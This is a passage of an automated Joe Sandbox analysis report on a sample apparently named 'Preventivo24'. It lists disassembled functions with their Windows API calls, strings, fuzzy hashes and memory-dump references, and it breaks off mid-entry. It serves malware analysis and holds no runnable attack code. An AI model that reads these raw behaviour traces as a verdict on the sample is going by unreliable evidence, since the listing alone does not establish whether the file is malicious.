Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CreateObjectSingleThreadWait$AllocateCloseCodeEventExitHandleHeap
String ID:
API String ID: 3066744267-0
Opcode ID: 3be23942c5c1b5a3e3fd53c3900512a0fa9d5053bb7e9c0ec67bdc476ba3310c
Instruction ID: 32c07493ecb416cee145a364f9fe672884e8d3518e12808b9331c938ce1913af
Opcode Fuzzy Hash: 3be23942c5c1b5a3e3fd53c3900512a0fa9d5053bb7e9c0ec67bdc476ba3310c
Instruction Fuzzy Hash: E3D14775A00219DFCB14CF68C984BADBBF5FF88310F2541A9E919AB3A1D735A841CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B4BC30 Relevance: 9.1, APIs: 6, Instructions: 69threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0018AA80,00CC001C,00000000,?), ref: 00B4BCAD
GetLastError.KERNEL32 ref: 00B4BCBA
WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00B4BCE3
GetExitCodeThread.KERNEL32(00000000,?), ref: 00B4BCFD
TerminateThread.KERNEL32(00000000,00000000), ref: 00B4BD15
FindCloseChangeNotification.KERNEL32(00000000), ref: 00B4BD1E

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Thread$ChangeCloseCodeCreateErrorExitFindLastNotificationObjectSingleTerminateWait
String ID:
API String ID: 766675602-0
Opcode ID: 432d401e83817029a3ad63f94fa1c124ecec5a499dd204905130a3921415415c
Instruction ID: e89a50cd7e8668ba7bce64fb3447da1a0df714bc0b1faa1e2c907cc3851db84f
Opcode Fuzzy Hash: 432d401e83817029a3ad63f94fa1c124ecec5a499dd204905130a3921415415c
Instruction Fuzzy Hash: 0931F8B0900209DBDF10CF94CD49BEEBBF4FB08324F2402A9E925B6290D7759A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B39560 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 283COMMON

Download Yara Rule

APIs

Part of subcall function 00B62440: GetUserNameW.ADVAPI32(?,?), ref: 00B624BB
Part of subcall function 00B62440: GetLastError.KERNEL32 ref: 00B624C5
Part of subcall function 00B62440: GetUserNameW.ADVAPI32(?,?), ref: 00B6250D
Part of subcall function 00B62440: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 00B62547
Part of subcall function 00B62440: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,-00000001,00000000), ref: 00B62592

GetCurrentProcess.KERNEL32(00000008,?,?,?,?), ref: 00B39875
OpenProcessToken.ADVAPI32(00000000), ref: 00B3987C
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00B398AB
FindCloseChangeNotification.KERNEL32(00000000), ref: 00B398C0

Strings

\/:*?"<>|, xrefs: 00B39641

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: EnvironmentNameProcessTokenUserVariable$ChangeCloseCurrentErrorFindInformationLastNotificationOpen
String ID: \/:*?"<>|
API String ID: 4131070906-3830478854
Opcode ID: a3d688f616328c295cee28222bf76e5af936058067e49e69d9309ede40f414e3
Instruction ID: c4da4b6866a03445aac17cd42e2615608e7bbc4d08b00e14e4fd11137d2bb3c3
Opcode Fuzzy Hash: a3d688f616328c295cee28222bf76e5af936058067e49e69d9309ede40f414e3
Instruction Fuzzy Hash: B7C1A930D00758DFDB15DFA8C8447AEBBB5FF45304F244299E40AAB291DBB46E49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B28090 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 217COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(80004005,00C1E245,26FBC52C,?,?,00000000,00000000,?,00000000,00C1E245,000000FF,?,80004005,26FBC52C,?,00000000), ref: 00B280F5
GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,?,00000000,00000000,?,00000000,00C1E245,000000FF,?,80004005,26FBC52C), ref: 00B28143

Strings

ProductName, xrefs: 00B281B1
\VarFileInfo\Translation, xrefs: 00B28185
\StringFileInfo\%04x%04x\%s, xrefs: 00B281BB

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: FileInfoVersion$Size
String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
API String ID: 2104008232-2149928195
Opcode ID: abad32813066dd4351f1e682c28caf5696feb382796719845aa8b5e0de0b869f
Instruction ID: 03b64ac2b5003cb7ec86f530128a59e732a55693735b5348ee8ea024da9cc146
Opcode Fuzzy Hash: abad32813066dd4351f1e682c28caf5696feb382796719845aa8b5e0de0b869f
Instruction Fuzzy Hash: 6871D030901619DFDB04DFA8D885BAEBBF8FF48314F1481A9E515A73A1DB34AD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D0C0 Relevance: 7.7, APIs: 5, Instructions: 174fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,00CB8488,00000001,26FBC52C,?,?,00000000,00000000,00C566E5,000000FF), ref: 00B1D1D7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B1D1E8
GetFileAttributesW.KERNEL32(?,?,?,00CB8488,00000001,26FBC52C,?,?,00000000,00000000,00C566E5,000000FF), ref: 00B1D1FB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B1D20C
FindNextFileW.KERNEL32(-00000001,?), ref: 00B1D25C

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$Attributes$FindNext
String ID:
API String ID: 3019667586-0
Opcode ID: f0363630f2fe991ada9a63e8f58c8b5b709013c458aef14c08a9555d3c358f8d
Instruction ID: 6750fb2cd016f3e78c4134acf00ac98dbc088bf6a4e77677236d2ac09b5d35ad
Opcode Fuzzy Hash: f0363630f2fe991ada9a63e8f58c8b5b709013c458aef14c08a9555d3c358f8d
Instruction Fuzzy Hash: 1F519C30500649ABDB24EF68CD48BEE77B4FF51310F8446A9E825A72E1DB749A84CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C950 Relevance: 7.6, APIs: 5, Instructions: 69synchronizationnetworkCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,?,00000000,00000000,00B5BB92,?,?,?,?,?,00000003,00000000,26FBC52C,?,00000000), ref: 00B5C963
InternetConnectW.WININET(00B5BB92,00B5BB92,00B5BB92,00B5BB92,00B5BB92,00B5BB92,00B5BB92), ref: 00B5C986
GetLastError.KERNEL32(?,?,00000000,00000000,00B5BB92,?,?,?,?,?,00000003,00000000,26FBC52C,?,00000000), ref: 00B5C990
WaitForSingleObject.KERNEL32(?,0000000A,?,?,00000000,00000000,00B5BB92,?,?,?,?,?,00000003,00000000,26FBC52C), ref: 00B5C9CA
SetEvent.KERNEL32(?,?,?,00000000,00000000,00B5BB92,?,?,?,?,?,00000003,00000000,26FBC52C,?,00000000), ref: 00B5C9F3

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Event$ConnectErrorInternetLastObjectResetSingleWait
String ID:
API String ID: 3866874665-0
Opcode ID: 6ec84965eff61d5dc4241c31a8673f0f58d909304bebdec316bdca5e64dc6cba
Instruction ID: 2ba91039d39701f7486effc1a7328fb0360a503d189a94a3ddcd45d36617cee7
Opcode Fuzzy Hash: 6ec84965eff61d5dc4241c31a8673f0f58d909304bebdec316bdca5e64dc6cba
Instruction Fuzzy Hash: 6411E9322007448FD7324B55D888B5A7FD6FB55322F0049EEE887D2661C734E898D760

Uniqueness

Uniqueness Score: -1.00%

Function 00B39EB0 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 561COMMON

Download Yara Rule

Strings

\\?\, xrefs: 00B3A3EA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: FindResource
String ID: \\?\
API String ID: 1635176832-4282027825
Opcode ID: 43dace081b4b4b4ebfe15b854661b0cfc9ba4d8790682d40e6fd86abca9f1c26
Instruction ID: 4c57e824415afefd1b2ce215a7d2dd7e86242660bb8d257bc81695d5b293df49
Opcode Fuzzy Hash: 43dace081b4b4b4ebfe15b854661b0cfc9ba4d8790682d40e6fd86abca9f1c26
Instruction Fuzzy Hash: A5329D30A006099BDB09DFA8C858BADBBF5FF44314F244299E825A73E1DB74AD45CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00B1E650 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjectsEx.USER32(00000001,000000FF,000000FF,000005FF,00000004), ref: 00B1E667
PeekMessageW.USER32(?,00000000), ref: 00B1E698
TranslateMessage.USER32(00000000), ref: 00B1E6A7
DispatchMessageW.USER32(00000000), ref: 00B1E6B2
MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 00B1E6C8

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
String ID:
API String ID: 4084795276-0
Opcode ID: e555750e2930877cc5f838ed44a318555c47c65b17562d899e69a0a965d5e136
Instruction ID: d003d23e418d94f6e6e4f48510bc73ae771a27fa9dc79da9054b0618886f033f
Opcode Fuzzy Hash: e555750e2930877cc5f838ed44a318555c47c65b17562d899e69a0a965d5e136
Instruction Fuzzy Hash: BA01B570A443017FF7108B618D45FABB7DCEB54F20F944619FA68D12D0EB74D6849B26

Uniqueness

Uniqueness Score: -1.00%

Function 00B42A70 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 372COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(00000010,26FBC52C,?,00000010,?), ref: 00B42DAE

Part of subcall function 00B19280: GetCurrentProcess.KERNEL32 ref: 00B192D2
Part of subcall function 00B19280: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00B192DF
Part of subcall function 00B19280: GetLastError.KERNEL32 ref: 00B192E9
Part of subcall function 00B19280: FindCloseChangeNotification.KERNEL32(00000000), ref: 00B193CC

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

Strings

[WindowsVolume], xrefs: 00B42B0C, 00B42B1E, 00B42B28
\\?\, xrefs: 00B42DBB
Extraction path set to:, xrefs: 00B42E11

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Process$Find$ChangeCloseCurrentErrorHeapLastNotificationOpenPathResourceToken
String ID: Extraction path set to:$[WindowsVolume]$\\?\
API String ID: 1213284423-3538578949
Opcode ID: 81d0e9f8dc98c0a7f189c2f652c2f89c3cf715649dedb0b28545e0b507f7f698
Instruction ID: 07595fae3e172109f810b540aa14ba0ca8ef9cfa4231a586ae77be025ccf56a7
Opcode Fuzzy Hash: 81d0e9f8dc98c0a7f189c2f652c2f89c3cf715649dedb0b28545e0b507f7f698
Instruction Fuzzy Hash: A4D1B131A00609DBCB05DF68C894BAEB7F5FF44320F548298F825AB391DB74AE01DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D400 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,00000000,00C16CAD,000000FF,?,80004005,26FBC52C), ref: 00B1D4B0

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

DeleteFileW.KERNEL32(?,26FBC52C,?,?,00000000,?,00000000,00C16CAD,000000FF,?,00B1D21A), ref: 00B1D4EB
GetLastError.KERNEL32(?,?,00000000,?,00000000,00C16CAD,000000FF,?,80004005,26FBC52C,?,?,00000000,?,?,00C16CAD), ref: 00B1D4FB

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Strings

\\?\, xrefs: 00B1D351, 00B1D363, 00B1D36D, 00B1D471, 00B1D483, 00B1D48D

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DeleteFile$ErrorFindHeapLastProcessResource
String ID: \\?\
API String ID: 2079828947-4282027825
Opcode ID: 8eda5bd482bbce34fa55a101d6ca083779f6f52de277861c8c2ac0411ab74fa0
Instruction ID: 87ad110f48b07366b3c18b612a3b3560af9224c56b7219bc3573c6eb8dd950a3
Opcode Fuzzy Hash: 8eda5bd482bbce34fa55a101d6ca083779f6f52de277861c8c2ac0411ab74fa0
Instruction Fuzzy Hash: FF31B4366006599FCB01DFA8D858BAEB7F4FF09320F544699E825D7390DB34AD40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B39130 Relevance: 6.3, APIs: 4, Instructions: 346COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B39208

Part of subcall function 00B4BC30: CreateThread.KERNEL32(00000000,00000000,Function_0018AA80,00CC001C,00000000,?), ref: 00B4BCAD
Part of subcall function 00B4BC30: GetLastError.KERNEL32 ref: 00B4BCBA
Part of subcall function 00B4BC30: WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00B4BCE3
Part of subcall function 00B4BC30: GetExitCodeThread.KERNEL32(00000000,?), ref: 00B4BCFD
Part of subcall function 00B4BC30: TerminateThread.KERNEL32(00000000,00000000), ref: 00B4BD15
Part of subcall function 00B4BC30: FindCloseChangeNotification.KERNEL32(00000000), ref: 00B4BD1E

GetTickCount.KERNEL32 ref: 00B39430
__Xtime_get_ticks.LIBCPMT ref: 00B39438
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B39491

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Thread$ChangeCloseCodeCountCreateErrorExitFindHeapInitializeLastNotificationObjectProcessSingleTerminateTickUnothrow_t@std@@@WaitXtime_get_ticks__ehfuncinfo$??2@
String ID:
API String ID: 4134029804-0
Opcode ID: e740f5d1ba6f302a34037c1552f0533225cd3db537ba5953ebc52d71d7305166
Instruction ID: b836fd31ff6e2f3a1105fbab591df2cae280967a1af0ef64b003d781e866fba6
Opcode Fuzzy Hash: e740f5d1ba6f302a34037c1552f0533225cd3db537ba5953ebc52d71d7305166
Instruction Fuzzy Hash: 01D1D271A00609DFDB11DFA8C845BAEBBF4FF48310F2441A9E905A7391DB74AE05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F37C0 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000000,00000000,?,26FBC52C,?,00000004), ref: 009F381B
DeleteFileW.KERNEL32(?,?,00000004), ref: 009F385F
CreateDirectoryW.KERNEL32(?,00000000,?,00000004), ref: 009F386E

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$CreateDeleteDirectoryNameTemp
String ID:
API String ID: 2411147693-0
Opcode ID: 452f4d9af18d5ea83c5e9e4beae185cecc960aa11efa65c576b960db983f74a6
Instruction ID: a3d1612ef66fc4b21de597109e92ce33dbb899ed760f1d3ed9a825abf0210019
Opcode Fuzzy Hash: 452f4d9af18d5ea83c5e9e4beae185cecc960aa11efa65c576b960db983f74a6
Instruction Fuzzy Hash: 88D19F70D04249DFDB14DF68C8497ADBBB4FF55304F20829AE819A7291EB786B84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B42700 Relevance: 6.2, APIs: 4, Instructions: 160fileCOMMON

Download Yara Rule

APIs

